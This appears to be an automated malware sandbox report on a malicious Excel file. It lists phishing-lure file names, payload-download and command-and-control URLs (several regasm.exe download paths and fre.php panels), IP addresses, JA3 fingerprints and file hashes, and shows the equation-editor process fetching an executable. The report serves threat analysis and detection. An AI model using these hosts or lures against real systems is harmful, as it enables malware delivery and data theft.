• VM ASIAN CHAMPION.xlsx, Detection: malicious, Context: russchine2wsdymapaws.dns.navy/russdoc/regasm.exe
• VM ASIAN CHAMPION.xlsx, Detection: malicious, Context: stdyrusschine2mapafr.dns.army/russdoc/regasm.exe
• NEW ORDER.xlsx, Detection: malicious, Context: sndyrusschine2mapanx.dns.army/russdoc/regasm.exe
• Remittance Advice_usd9534.46.xlsx, Detection: malicious, Context: russchine2sndymapanxmenischangednetsncm.ydns.eu/russdoc/regasm.exe
• Remittance Advice_usd9534.46.xlsx, Detection: malicious, Context: russchine2sndymapanxmenischangednetsncm.ydns.eu/russdoc/regasm.exe
• INV_F3C-20CX-F3C05.xlsx, Detection: malicious, Context: tudyrusschine2mapanxmenischangednetuicm.ydns.eu/russdoc/regasm.exe
• MV JIN SHENG SHUI.xlsx, Detection: malicious, Context: russchine2stdymapanxmenischangednestvdq.ydns.eu/russdoc/regasm.exe
• TMB-CI2006-003.xlsx, Detection: malicious, Context: thdyrusschine2mapanxmenischangednethnbc.ydns.eu/russdoc/regasm.exe
Match: 185.208.180.121
• 1BcHGhheBy.exe, Detection: malicious, Context: becharnise.ir/fa15/fre.php
• New Order.doc, Detection: malicious, Context: becharnise.ir/fa15/fre.php
• PO. pdf.exe, Detection: malicious, Context: becharnise.ir/fa12/fre.php
• PI2rBmugqT.exe, Detection: malicious, Context: becharnise.ir/fa11/fre.php
• P.I 467301.xlsx, Detection: malicious, Context: becharnise.ir/fa11/fre.php
• TMFZ3kZZ4L.exe, Detection: malicious, Context: becharnise.ir/fa11/fre.php
• Funds Info.xlsx, Detection: malicious, Context: becharnise.ir/fa11/fre.php
• 6vsSE5VaSM.exe, Detection: malicious, Context: becharnise.ir/fa11/fre.php
• fBcCR6EOOW.exe, Detection: malicious, Context: becharnise.ir/fa16/fre.php
• RFQ 1002.xlsx, Detection: malicious, Context: becharnise.ir/fa1/fre.php
• TELEGRAPHIC TRANSFER.xlsx, Detection: malicious, Context: becharnise.ir/fa11/fre.php
• SecuriteInfo.com.BackDoor.SpyBotNET.25.26322.exe, Detection: malicious, Context: becharnise.ir/fa11/fre.php
• SecuriteInfo.com.Trojan.DownloaderNET.117.15729.exe, Detection: malicious, Context: becharnise.ir/fa18/fre.php
• scan00006.xlsx, Detection: malicious, Context: becharnise.ir/fa16/fre.php
• Payment Swift.xlsx, Detection: malicious, Context: becharnise.ir/fa11/fre.php
• DHL INVOICE .exe, Detection: malicious, Context: becharnise.ir/fox/fre.php
• MFxGaBGmS2.exe, Detection: malicious, Context: becharnise.ir/tws/fre.php
• 516Lnlw30O.exe, Detection: malicious, Context: becharnise.ir/fa11/fre.php
• L2WxaHfgd1.exe, Detection: malicious, Context: becharnise.ir/fa16/fre.php
• RFQ WBH00738_.xlsx, Detection: malicious, Context: becharnise.ir/tws/fre.php

                Domains

Match / Associated Sample Name / Detection / Context
Match: cutt.ly
• Purchase Order.xlsx, Detection: malicious, Context: 172.67.8.238
• Inquiry Bulgaria.xls, Detection: malicious, Context: 172.67.8.238
• Inquiry Bulgaria.xls, Detection: malicious, Context: 104.22.1.232
• ProtectedAdviceSlip.xls, Detection: malicious, Context: 104.22.0.232
• notice of arrival.xlsx, Detection: malicious, Context: 172.67.8.238
• DHL_PRG201123213594.xlsx, Detection: malicious, Context: 104.22.1.232
• P.I 467301.xlsx, Detection: malicious, Context: 172.67.8.238
• Eur Swift copy.xlsx, Detection: malicious, Context: 104.22.0.232
• RFQ 2027376.xlsx, Detection: malicious, Context: 104.22.1.232
• PL + CI.xlsx, Detection: malicious, Context: 104.22.0.232
• Funds Info.xlsx, Detection: malicious, Context: 104.22.1.232
• Gresik Port Enquiry.xlsx, Detection: malicious, Context: 172.67.8.238
• aaHyijkXFm.docx, Detection: malicious, Context: 172.67.8.238
• aaHyijkXFm.docx, Detection: malicious, Context: 104.22.0.232
• Inquiry from Pure fine food Ltd.xlsx, Detection: malicious, Context: 104.22.0.232
• RFQ 1002.xlsx, Detection: malicious, Context: 104.22.1.232
• MV SEIYO FORTUNE REF 27 - QUOTATION.xlsx, Detection: malicious, Context: 104.22.1.232
• COVER LETTER SWFT200022823419.xlsx, Detection: malicious, Context: 104.22.1.232
• GRAND DEMETER_INV210211_00.xlsx, Detection: malicious, Context: 172.67.8.238
• Invoice 3110201031.xlsx, Detection: malicious, Context: 104.22.0.232
Match: becharnise.ir
• 1BcHGhheBy.exe, Detection: malicious, Context: 185.208.180.121
• New Order.doc, Detection: malicious, Context: 185.208.180.121
• PO. pdf.exe, Detection: malicious, Context: 185.208.180.121
• PI2rBmugqT.exe, Detection: malicious, Context: 185.208.180.121
• P.I 467301.xlsx, Detection: malicious, Context: 185.208.180.121
• TMFZ3kZZ4L.exe, Detection: malicious, Context: 185.208.180.121
• Funds Info.xlsx, Detection: malicious, Context: 185.208.180.121
• 6vsSE5VaSM.exe, Detection: malicious, Context: 185.208.180.121
• fBcCR6EOOW.exe, Detection: malicious, Context: 185.208.180.121
• RFQ 1002.xlsx, Detection: malicious, Context: 185.208.180.121
• TELEGRAPHIC TRANSFER.xlsx, Detection: malicious, Context: 185.208.180.121
• SecuriteInfo.com.BackDoor.SpyBotNET.25.26322.exe, Detection: malicious, Context: 185.208.180.121
• SecuriteInfo.com.Trojan.DownloaderNET.117.15729.exe, Detection: malicious, Context: 185.208.180.121
• scan00006.xlsx, Detection: malicious, Context: 185.208.180.121
• Payment Swift.xlsx, Detection: malicious, Context: 185.208.180.121
• DHL INVOICE .exe, Detection: malicious, Context: 185.208.180.121
• MFxGaBGmS2.exe, Detection: malicious, Context: 185.208.180.121
• 516Lnlw30O.exe, Detection: malicious, Context: 185.208.180.121
• L2WxaHfgd1.exe, Detection: malicious, Context: 185.208.180.121
• RFQ WBH00738_.xlsx, Detection: malicious, Context: 185.208.180.121
Match: stdyrusschinetwomast.dns.army
• E68-STD-239-2020-239.xlsx, Detection: malicious, Context: 103.141.138.123

                ASN

Match / Associated Sample Name / Detection / Context
Match: AMINIDCIR
• 1BcHGhheBy.exe, Detection: malicious, Context: 185.208.180.121
• New Order.doc, Detection: malicious, Context: 185.208.180.121
• PO. pdf.exe, Detection: malicious, Context: 185.208.180.121
• PI2rBmugqT.exe, Detection: malicious, Context: 185.208.180.121
• P.I 467301.xlsx, Detection: malicious, Context: 185.208.180.121
• TMFZ3kZZ4L.exe, Detection: malicious, Context: 185.208.180.121
• Funds Info.xlsx, Detection: malicious, Context: 185.208.180.121
• 6vsSE5VaSM.exe, Detection: malicious, Context: 185.208.180.121
• fBcCR6EOOW.exe, Detection: malicious, Context: 185.208.180.121
• RFQ 1002.xlsx, Detection: malicious, Context: 185.208.180.121
• TELEGRAPHIC TRANSFER.xlsx, Detection: malicious, Context: 185.208.180.121
• SecuriteInfo.com.BackDoor.SpyBotNET.25.26322.exe, Detection: malicious, Context: 185.208.180.121
• SecuriteInfo.com.Trojan.DownloaderNET.117.15729.exe, Detection: malicious, Context: 185.208.180.121
• scan00006.xlsx, Detection: malicious, Context: 185.208.180.121
• Payment Swift.xlsx, Detection: malicious, Context: 185.208.180.121
• DHL INVOICE .exe, Detection: malicious, Context: 185.208.180.121
• MFxGaBGmS2.exe, Detection: malicious, Context: 185.208.180.121
• 516Lnlw30O.exe, Detection: malicious, Context: 185.208.180.121
• L2WxaHfgd1.exe, Detection: malicious, Context: 185.208.180.121
• RFQ WBH00738_.xlsx, Detection: malicious, Context: 185.208.180.121
Match: VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN
• Quotation(6656).exe, Detection: malicious, Context: 103.89.88.238
• Quotation-15-02-2021_PDF.exe, Detection: malicious, Context: 103.114.106.35
• swift copy.exe, Detection: malicious, Context: 103.89.88.238
• gyhHPdvJt1.exe, Detection: malicious, Context: 103.151.123.132
• P.I 467301.xlsx, Detection: malicious, Context: 103.99.1.173
• Remittance copy.xlsx, Detection: malicious, Context: 103.99.1.145
• Eur Swift copy.xlsx, Detection: malicious, Context: 103.99.1.158
• RFQ 2027376.xlsx, Detection: malicious, Context: 103.141.138.128
• Quotation_11-02-2021_WSBDJ.exe, Detection: malicious, Context: 103.114.106.35
• PL + CI.xlsx, Detection: malicious, Context: 103.141.138.125
• Funds Info.xlsx, Detection: malicious, Context: 103.99.1.173
• Scan_ 11 Feb 2021 at 1.25_Bz5543_PDF.exe, Detection: malicious, Context: 103.114.107.184
• Signed PO202002FiveBro2A2.exe, Detection: malicious, Context: 103.151.123.132
• Gresik Port Enquiry.xlsx, Detection: malicious, Context: 180.214.238.131
• SKM_C258201001130020005057.exe, Detection: malicious, Context: 103.151.123.132
• Scan_ 10 Feb 2021 at 1.45_Bz5543_PDF.exe, Detection: malicious, Context: 103.114.107.184
• SKM_C258201001130020005057.exe, Detection: malicious, Context: 103.151.123.132
• Inquiry from Pure fine food Ltd.xlsx, Detection: malicious, Context: 103.141.138.118
• RFQ 1002.xlsx, Detection: malicious, Context: 103.141.138.125
• MV SEIYO FORTUNE REF 27 - QUOTATION.xlsx, Detection: malicious, Context: 103.140.251.164
Match: CLOUDFLARENETUS
• tS9P6wPz9x.exe, Detection: malicious, Context: 104.21.78.13
• SecuriteInfo.com.Generic.mg.44669e0ff064dfc9.dll, Detection: malicious, Context: 104.20.185.68
• SecuriteInfo.com.Generic.mg.3964ec2fe493ed56.dll, Detection: malicious, Context: 104.20.185.68
• SecuriteInfo.com.Generic.mg.f76b81b0397ae313.dll, Detection: malicious, Context: 104.20.184.68
• SecuriteInfo.com.Generic.mg.f77e7bd43f365593.dll, Detection: malicious, Context: 104.20.184.68
• B62672021 PRETORIA.doc, Detection: malicious, Context: 104.21.45.223
• NJPcHPuRcG.dll, Detection: malicious, Context: 104.20.184.68
• Ne6A4k8vK6.dll, Detection: malicious, Context: 104.20.184.68
• 13xakh1PtD.dll, Detection: malicious, Context: 104.20.184.68
• RFQ.xls, Detection: malicious, Context: 104.20.139.65
• DUcKsYsyX0.dll, Detection: malicious, Context: 104.20.184.68
• RI51uAIUyL.dll, Detection: malicious, Context: 104.20.184.68
• IVJq3tVi96.exe, Detection: malicious, Context: 104.21.19.200
• Doc0538-2-21.xls, Detection: malicious, Context: 104.20.138.65
• COTIZACI#U00d3N.exe, Detection: malicious, Context: 104.21.19.200
• REQUEST FOR QOUTATION.exe, Detection: malicious, Context: 104.21.19.200
• DHL_6368638172 documento de recibo,pdf.exe, Detection: malicious, Context: 162.159.133.233
• Shipping Documents Original BL, Invoice & Packing List.exe, Detection: malicious, Context: 172.67.188.154
• aS94x3Qp1s.exe, Detection: malicious, Context: 104.21.19.200
• Purchase Order.xlsx, Detection: malicious, Context: 172.67.8.238

                JA3 Fingerprints

Match / Associated Sample Name / Detection / Context
Match: 7dcce5b76c8b17472d024758970a406b
• significant (92).xls, Detection: malicious, Context: 172.67.8.238
• necessary (47).xls, Detection: malicious, Context: 172.67.8.238
• Purchase Order.xlsx, Detection: malicious, Context: 172.67.8.238
• cotizacin.doc, Detection: malicious, Context: 172.67.8.238
• Revised Order 193-002.doc, Detection: malicious, Context: 172.67.8.238
• DOCUMENT (63).xls, Detection: malicious, Context: 172.67.8.238
• estimated (99).xls, Detection: malicious, Context: 172.67.8.238
• documents (29).xls, Detection: malicious, Context: 172.67.8.238
• DkELZjJtGY.xlsm, Detection: malicious, Context: 172.67.8.238
• DHL - SL720073066537TX(3).docx, Detection: malicious, Context: 172.67.8.238
• notice of arrival.xlsx, Detection: malicious, Context: 172.67.8.238
• DHL_PRG201123213594.xlsx, Detection: malicious, Context: 172.67.8.238
• selfassessment.docm, Detection: malicious, Context: 172.67.8.238
• selfassessment.docm, Detection: malicious, Context: 172.67.8.238
• P.I 467301.xlsx, Detection: malicious, Context: 172.67.8.238
• Remittance copy.xlsx, Detection: malicious, Context: 172.67.8.238
• Eur Swift copy.xlsx, Detection: malicious, Context: 172.67.8.238
• RFQ 2027376.xlsx, Detection: malicious, Context: 172.67.8.238
• TKL Steel Quotation.doc, Detection: malicious, Context: 172.67.8.238
• SecuriteInfo.com.VB.Heur.EmoDldr.32.39676696.Gen.27336.doc, Detection: malicious, Context: 172.67.8.238

                Dropped Files

                No context

                Created / dropped Files

                C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
                Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                File Type:Microsoft Cabinet archive data, 59134 bytes, 1 file
                Category:dropped
                Size (bytes):59134
                Entropy (8bit):7.995450161616763
                Encrypted:true
                SSDEEP:1536:R695NkJMM0/7laXXHAQHQaYfwlmz8efIqigYDff:RN7MlanAQwEIztTk
                MD5:E92176B0889CC1BB97114BEB2F3C1728
                SHA1:AD1459D390EC23AB1C3DA73FF2FBEC7FA3A7F443
                SHA-256:58A4F38BA43F115BA3F465C311EAAF67F43D92E580F7F153DE3AB605FC9900F3
                SHA-512:CD2267BA2F08D2F87538F5B4F8D3032638542AC3476863A35F0DF491EB3A84458CE36C06E8C1BD84219F5297B6F386748E817945A406082FA8E77244EC229D8F
                Malicious:false
                Reputation:moderate, very likely benign file
                Preview: MSCF............,...................I........T.........R.. .authroot.stl.ym&7.5..CK..8T....c_.d...:.(.....].M$[v.4.).E.$7*I.....e..Y..Rq...3.n..u..............|..=H....&..1.1..f.L..>e.6....F8.X.b.1$,.a...n-......D..a....[.....i,+.+..<.b._#...G..U.....n..21*pa..>.32..Y..j...;Ay........n/R... ._.+..<...Am.t.<. ..V..y`.yO..e@../...<#..#......dju*..B......8..H'..lr.....l.I6/..d.].xIX<...&U...GD..Mn.y&.[<(tk.....%B.b;./..`.#h....C.P...B..8d.F...D.k........... 0..w...@(.. @K....?.)ce........\.\......l......Q.Qd..+...@.X..##3..M.d..n6.....p1..)...x0V...ZK.{...{.=#h.v.).....b...*..[...L..*c..a..,...E5X..i.d..w.....#o*+.........X.P...k...V.$...X.r.e....9E.x..=\...Km.......B...Ep...xl@@c1.....p?...d.{EYN.K.X>D3..Z..q.] .Mq.........L.n}........+/l\.cDB0.'.Y...r.[.........vM...o.=....zK..r..l..>B....U..3....Z...ZjS...wZ.M...IW;..e.L...zC.wBtQ..&.Z.Fv+..G9.8..!..\T:K`......m.........9T.u..3h.....{...d[...@...Q.?..p.e.t[.%7..........^.....s.
                C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
                Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                File Type:data
                Category:dropped
                Size (bytes):328
                Entropy (8bit):3.0737496840385012
                Encrypted:false
                SSDEEP:6:kKDQZbqoN+SkQlPlEGYRMY9z+4KlDA3RUeKlF+adAlf:LQA3kPlE99SNxAhUeo+aKt
                MD5:B54E87F83B8F07BB438A682306059DDA
                SHA1:4AE56DB76D87A5FD04D403F3EC6064475D1BB1D7
                SHA-256:81FBD3AF5D94928932AA195BEF6DD9A4E0AD98669B8FA52701FCE2114E1DCD34
                SHA-512:7F9F34C6BE796D7120D09E5FC73793693C6E1982830E8C6DA1969D136EBC4AC07C8C1DD389E67F2218EF9550310123E0F3E7EE629652059582E2E12B31E0CAEE
                Malicious:false
                Reputation:low
                Preview: p...... ..........A.u...(....................................................... ..................&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.e.b.b.a.e.1.d.7.e.a.d.6.1.:.0."...
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\regasm[1].exe
                Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                Category:downloaded
                Size (bytes):269312
                Entropy (8bit):6.728521643538962
                Encrypted:false
                SSDEEP:6144:T1wUIRkrbJzmFuERDOm+dwclg+8Iy+8Cl9Tf6BxUemJ:T1ORkr1CFuERD9+yb+R8k9TS79mJ
                MD5:2559B5B8D60DD663DF52D0570F5973A9
                SHA1:2AF0E521C34CF7EAAE8677E593900024FE0D16C9
                SHA-256:77EFE5A35F94F065B20860F7E446432D9C61FD6B139B1F4CD360A5A728F49410
                SHA-512:EAFD4ADD02278EE7C827A8EE21827D47ADCAFCA0D29F1CFAC2DE5DC6DDD734BA4C3B74A50DA6C977AF84DEC72498EE4642DA6328459AC659CA84C8CD5F69E669
                Malicious:true
                Antivirus:
                • Antivirus: Joe Sandbox ML, Detection: 100%
                • Antivirus: ReversingLabs, Detection: 36%
                Reputation:low
                IE Cache URL:http://stdyrusschinetwomast.dns.army/receiprt/regasm.exe
                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........{.f...5...5...5.HP5...5.HA5...5.HF5...5..5...5...5...5.HO5...5.HW5...5.HQ5...5.HT5...5Rich...5........................PE..L....A.]............................@0............@.................................m0.............................. ...b...`}..<........v...........................................................................................................text...q........................... ..`.rdata..............................@..@.data....t.......(...|..............@....rsrc....v.......x..................@..@........................................................................................................................................................................................................................................................................................................................................................
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4E4EC363.png
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:PNG image data, 566 x 429, 8-bit/color RGBA, non-interlaced
                Category:dropped
                Size (bytes):84203
                Entropy (8bit):7.979766688932294
                Encrypted:false
                SSDEEP:1536:RrpoeM3WUHO25A8HD3So4lL9jvtO63O2l/Wr9nuQvs+9QvM4PmgZuVHdJ5v3ZK7+:H5YHOhwx4lRTtO6349uQvXJ4PmgZu11J
                MD5:208FD40D2F72D9AED77A86A44782E9E2
                SHA1:216B99E777ED782BDC3BFD1075DB90DFDDABD20F
                SHA-256:CBFDB963E074C150190C93796163F3889165BF4471CA77C39E756CF3F6F703FF
                SHA-512:7BCE80FFA8B0707E4598639023876286B6371AE465A9365FA21D2C01405AB090517C448514880713CA22875013074DB9D5ED8DA93C223F265C179CFADA609A64
                Malicious:false
                Reputation:low
                Preview: .PNG........IHDR...6...........>(....sRGB.........gAMA......a.....pHYs..........+......IDATx^.=v\9..H..f...:ZA..,'..j.r4.........SEJ,%..VPG..K.=....@.$oI.e7....U...... ....>n~&..._..._.rg....L...D.G!0..G!;...?...Oo.7....Cc...G....g>......_o..._._.}q...k.....ru..T.....S.!....~..@Y96.S.....&..1.:....o...q.6..S...'n..H.hS......y;.N.l.)."[ `.f.X.u.n.;........._h.(.u|0a.....].R.z...2......GJY|\..+b...{>vU.....i...........w+.p...X..._.V.-z..s..U..cR..g^..X......6n...6....O6.-.AM.f.=y ...7...;X....q..|...=.|K...w...}O..{|...G........~.o3.....z....m6...sN.0..;/....Y..H..o............~........(W.`...S.t......m....+.K...<..M=...IN.U..C..].5.=...s..g.d..f.<Km..$..fS...o..:..}@...;k..m.L./.$......,}....3%..|j.....b.r7.O!F...c'......$...)....|O.CK...._......Nv....q.t3l.,. ....vD.-..o..k.w.....X...-C..KGld.8.a}|..,.....,....q.=r..Pf.V#.....n...}........[w...N.b..W......;..?.Oq..K{>.K.....{w{.......6'/...,.}.E...X.I.-Y].JJm.j..pq|.0...e.v......17...:F
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\83553F27.emf
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                Category:dropped
                Size (bytes):653280
                Entropy (8bit):2.898644879031968
                Encrypted:false
                SSDEEP:3072:+34UL0tS6WB0JOqFVY5QcARI/McGdAT9kRLFdtSyUu50yknG/qc+x:Q4UcLe0JOqQQZR8MDdATCR3tS+jqcC
                MD5:84AAA60F0AF5E0EDDB2933443E1474CB
                SHA1:C7D60583C47D7751E5F8A979FCA6810B9773D0C1
                SHA-256:A29F496C4454E7504D57570F001E2104EFB668C350B5F86D9FE781FE071F3754
                SHA-512:3683B8E5412FE101E97153A37EB51E5B2F82D1EBEE2D39236EF369AA06F028F6B49DF0AB198017E73B41626F62E9D6F86E3A0D16B1D838DD316DB7747BA736B0
                Malicious:false
                Reputation:low
                Preview: ....l...........S................@...#.. EMF........(...............................................\K..hC..F...,... ...EMF+.@..................X...X...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..............................................I...c...%...........%...................................R...p................................@."C.a.l.i.b.r.i.......................................................8................N.].....................N.]........ ....ylR........ ............zlR............................................X...%...7...................{ .@................C.a.l.i.b.r.............(...X............2eR.................{cR....,.......dv......%...........%...........%...........!.......................I...c..."...........%...........%...........%...........T...T..........................@.E.@T...........L...............I...c...P... ...6...F...$.......EMF+*@..$..........?...........?.........@...........@..........*@..$..........?....
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\87860A6A.png
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:PNG image data, 712 x 712, 8-bit/color RGBA, non-interlaced
                Category:dropped
                Size (bytes):111378
                Entropy (8bit):7.963743447431302
                Encrypted:false
                SSDEEP:3072:AE34q7rqNP36BuuQOlx2UXdx+yx9uWqFOp:b3brGP3lujnd3Fx9Pqgp
                MD5:5ACDB72AF63832D23CED937B6B976471
                SHA1:BC754ECEF3BEC86C6AFCC1AF644190AAFC34D9B7
                SHA-256:6D73F61D9E2A5E01DEE491E4E1F8600E0409879B86DB69B193CCF31CFD517DF3
                SHA-512:FAE05526AA18F0EC0725C089A9252FEE54C995FC5D9C4590EC9DB2B0B6192AB6BD3C6CECF5703E235536433C2DAB5C0356FE95657FE9B14574C8F13320774D23
                Malicious:false
                Reputation:moderate, very likely benign file
                Preview: .PNG........IHDR.............b..v....sRGB.........gAMA......a.....pHYs..........+......IDATx^..|g.U.4.G...#..A....*.......>.i .....E..._.........R.....& A.).`Q'r`...%.22q.R..0...v.. .a..c....s..g.s...1.I..;......Z{..^..>..................E..8.................. C.@..@..@..@..@.!...... .. .. .. ..p... .. .. .. .. .'..24..@..@..@..@...A................"................h$...FD...@..@..@..@.0...|................4...................&.p.....W............F.p..................D...a.6... .. .. .. .H..r#"\.. .. .. .. p...A>L.F_A..@..@..@.....AnD..@..@..@..@.....8.I..+...........@#.8..p.............a"...0I.}............h$..................8L.. .&i.. .. .. .. ..... 7".. .. .. .. ........$m...@..@..@..@.....FD...@..@..@..@.0...|................4...................&.p.....W............F.p..................D...a.6... .. .. .. .H`...p...............p...|.n|.5.....4... .. .. .. .O.... ... .. .. .. ......+p.....?...............\...r.^...@..@..@..@.........0... .. .. .. ..eD.[... .. .. .
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A79A1ACD.png
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:PNG image data, 566 x 429, 8-bit/color RGBA, non-interlaced
                Category:dropped
                Size (bytes):84203
                Entropy (8bit):7.979766688932294
                Encrypted:false
                SSDEEP:1536:RrpoeM3WUHO25A8HD3So4lL9jvtO63O2l/Wr9nuQvs+9QvM4PmgZuVHdJ5v3ZK7+:H5YHOhwx4lRTtO6349uQvXJ4PmgZu11J
                MD5:208FD40D2F72D9AED77A86A44782E9E2
                SHA1:216B99E777ED782BDC3BFD1075DB90DFDDABD20F
                SHA-256:CBFDB963E074C150190C93796163F3889165BF4471CA77C39E756CF3F6F703FF
                SHA-512:7BCE80FFA8B0707E4598639023876286B6371AE465A9365FA21D2C01405AB090517C448514880713CA22875013074DB9D5ED8DA93C223F265C179CFADA609A64
                Malicious:false
                Reputation:low
                Preview: .PNG........IHDR...6...........>(....sRGB.........gAMA......a.....pHYs..........+......IDATx^.=v\9..H..f...:ZA..,'..j.r4.........SEJ,%..VPG..K.=....@.$oI.e7....U...... ....>n~&..._..._.rg....L...D.G!0..G!;...?...Oo.7....Cc...G....g>......_o..._._.}q...k.....ru..T.....S.!....~..@Y96.S.....&..1.:....o...q.6..S...'n..H.hS......y;.N.l.)."[ `.f.X.u.n.;........._h.(.u|0a.....].R.z...2......GJY|\..+b...{>vU.....i...........w+.p...X..._.V.-z..s..U..cR..g^..X......6n...6....O6.-.AM.f.=y ...7...;X....q..|...=.|K...w...}O..{|...G........~.o3.....z....m6...sN.0..;/....Y..H..o............~........(W.`...S.t......m....+.K...<..M=...IN.U..C..].5.=...s..g.d..f.<Km..$..fS...o..:..}@...;k..m.L./.$......,}....3%..|j.....b.r7.O!F...c'......$...)....|O.CK...._......Nv....q.t3l.,. ....vD.-..o..k.w.....X...-C..KGld.8.a}|..,.....,....q.=r..Pf.V#.....n...}........[w...N.b..W......;..?.Oq..K{>.K.....{w{.......6'/...,.}.E...X.I.-Y].JJm.j..pq|.0...e.v......17...:F
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CD4CBEFC.png
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:PNG image data, 712 x 712, 8-bit/color RGBA, non-interlaced
                Category:dropped
                Size (bytes):111378
                Entropy (8bit):7.963743447431302
                Encrypted:false
                SSDEEP:3072:AE34q7rqNP36BuuQOlx2UXdx+yx9uWqFOp:b3brGP3lujnd3Fx9Pqgp
                MD5:5ACDB72AF63832D23CED937B6B976471
                SHA1:BC754ECEF3BEC86C6AFCC1AF644190AAFC34D9B7
                SHA-256:6D73F61D9E2A5E01DEE491E4E1F8600E0409879B86DB69B193CCF31CFD517DF3
                SHA-512:FAE05526AA18F0EC0725C089A9252FEE54C995FC5D9C4590EC9DB2B0B6192AB6BD3C6CECF5703E235536433C2DAB5C0356FE95657FE9B14574C8F13320774D23
                Malicious:false
                Reputation:moderate, very likely benign file
                Preview: .PNG........IHDR.............b..v....sRGB.........gAMA......a.....pHYs..........+......IDATx^..|g.U.4.G...#..A....*.......>.i .....E..._.........R.....& A.).`Q'r`...%.22q.R..0...v.. .a..c....s..g.s...1.I..;......Z{..^..>..................E..8.................. C.@..@..@..@..@.!...... .. .. .. ..p... .. .. .. .. .'..24..@..@..@..@...A................"................h$...FD...@..@..@..@.0...|................4...................&.p.....W............F.p..................D...a.6... .. .. .. .H..r#"\.. .. .. .. p...A>L.F_A..@..@..@.....AnD..@..@..@..@.....8.I..+...........@#.8..p.............a"...0I.}............h$..................8L.. .&i.. .. .. .. ..... 7".. .. .. .. ........$m...@..@..@..@.....FD...@..@..@..@.0...|................4...................&.p.....W............F.p..................D...a.6... .. .. .. .H`...p...............p...|.n|.5.....4... .. .. .. .O.... ... .. .. .. ......+p.....?...............\...r.^...@..@..@..@.........0... .. .. .. ..eD.[... .. .. .
                C:\Users\user\AppData\Local\Temp\Cab75DC.tmp
                Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                File Type:Microsoft Cabinet archive data, 59134 bytes, 1 file
                Category:dropped
                Size (bytes):59134
                Entropy (8bit):7.995450161616763
                Encrypted:true
                SSDEEP:1536:R695NkJMM0/7laXXHAQHQaYfwlmz8efIqigYDff:RN7MlanAQwEIztTk
                MD5:E92176B0889CC1BB97114BEB2F3C1728
                SHA1:AD1459D390EC23AB1C3DA73FF2FBEC7FA3A7F443
                SHA-256:58A4F38BA43F115BA3F465C311EAAF67F43D92E580F7F153DE3AB605FC9900F3
                SHA-512:CD2267BA2F08D2F87538F5B4F8D3032638542AC3476863A35F0DF491EB3A84458CE36C06E8C1BD84219F5297B6F386748E817945A406082FA8E77244EC229D8F
                Malicious:false
                Preview: MSCF............,...................I........T.........R.. .authroot.stl.ym&7.5..CK..8T....c_.d...:.(.....].M$[v.4.).E.$7*I.....e..Y..Rq...3.n..u..............|..=H....&..1.1..f.L..>e.6....F8.X.b.1$,.a...n-......D..a....[.....i,+.+..<.b._#...G..U.....n..21*pa..>.32..Y..j...;Ay........n/R... ._.+..<...Am.t.<. ..V..y`.yO..e@../...<#..#......dju*..B......8..H'..lr.....l.I6/..d.].xIX<...&U...GD..Mn.y&.[<(tk.....%B.b;./..`.#h....C.P...B..8d.F...D.k........... 0..w...@(.. @K....?.)ce........\.\......l......Q.Qd..+...@.X..##3..M.d..n6.....p1..)...x0V...ZK.{...{.=#h.v.).....b...*..[...L..*c..a..,...E5X..i.d..w.....#o*+.........X.P...k...V.$...X.r.e....9E.x..=\...Km.......B...Ep...xl@@c1.....p?...d.{EYN.K.X>D3..Z..q.] .Mq.........L.n}........+/l\.cDB0.'.Y...r.[.........vM...o.=....zK..r..l..>B....U..3....Z...ZjS...wZ.M...IW;..e.L...zC.wBtQ..&.Z.Fv+..G9.8..!..\T:K`......m.........9T.u..3h.....{...d[...@...Q.?..p.e.t[.%7..........^.....s.
                C:\Users\user\AppData\Local\Temp\Tar75DD.tmp
                Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                File Type:data
                Category:dropped
                Size (bytes):152788
                Entropy (8bit):6.316654432555028
                Encrypted:false
                SSDEEP:1536:WIA6c7RbAh/E9nF2hspNuc8odv+1//FnzAYtYyjCQxSMnl3xlUwg:WAmfF3pNuc7v+ltjCQSMnnSx
                MD5:64FEDADE4387A8B92C120B21EC61E394
                SHA1:15A2673209A41CCA2BC3ADE90537FE676010A962
                SHA-256:BB899286BE1709A14630DC5ED80B588FDD872DB361678D3105B0ACE0D1EA6745
                SHA-512:655458CB108034E46BCE5C4A68977DCBF77E20F4985DC46F127ECBDE09D6364FE308F3D70295BA305667A027AD12C952B7A32391EFE4BD5400AF2F4D0D830875
                Malicious:false
